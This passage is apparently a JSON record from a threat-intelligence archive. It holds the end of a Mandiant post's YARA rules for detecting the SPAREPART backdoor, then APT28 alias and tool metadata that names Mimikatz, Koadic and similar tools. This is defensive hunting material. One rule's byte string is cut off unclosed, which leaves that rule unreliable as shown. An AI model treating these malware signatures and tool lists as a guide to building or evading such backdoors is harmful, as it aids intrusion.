05 33 c1 83 e0 01}\r\n        $ = {8B 80 FC 00 00 00}\r\n        $ = {D1 E8 [4] c1 E1 0f 0b c1}\r\n    condition:\r\n        all of them\r\n}\r\nrule M_Backdoor_SPAREPART_Struct\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        date_created = \"2022-12-14\"\r\n        description = \"Detects the PDB and a struct used in SPAREPART\"\r\n        hash = \"f9cd5b145e372553dded92628db038d8\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    strings:\r\n        $pdb = 
\"c:\\\\Users\\\\user\\\\Desktop\\\\ImageAgent\\\\ImageAgent\\\\PreAgent\\\\src\\\\builder\\\\agent.pdb\" ascii nocase\r\n        $struct = { 44 89 ac ?? ?? ?? ?? ?? 4? 8b ac ?? ?? ?? ?? ?? 4? 83 c5 28 89 84 ?? ?? ?? ?? ?? 89 8c ?? ??\r\n    condition:\r\n        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and\r\n        $pdb and\r\n        $struct and\r\n        filesize \u003c 20KB\r\n}\r\nPosted in: Threat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government"
	],
	"report_names": [
		"trojanized-windows-installers-ukrainian-government"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434221,
	"ts_updated_at": 1775826775,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7cb24cc595c3aca655b66d961c523a915af58560.pdf",
		"text": "https://archive.orkl.eu/7cb24cc595c3aca655b66d961c523a915af58560.txt",
		"img": "https://archive.orkl.eu/7cb24cc595c3aca655b66d961c523a915af58560.jpg"
	}
}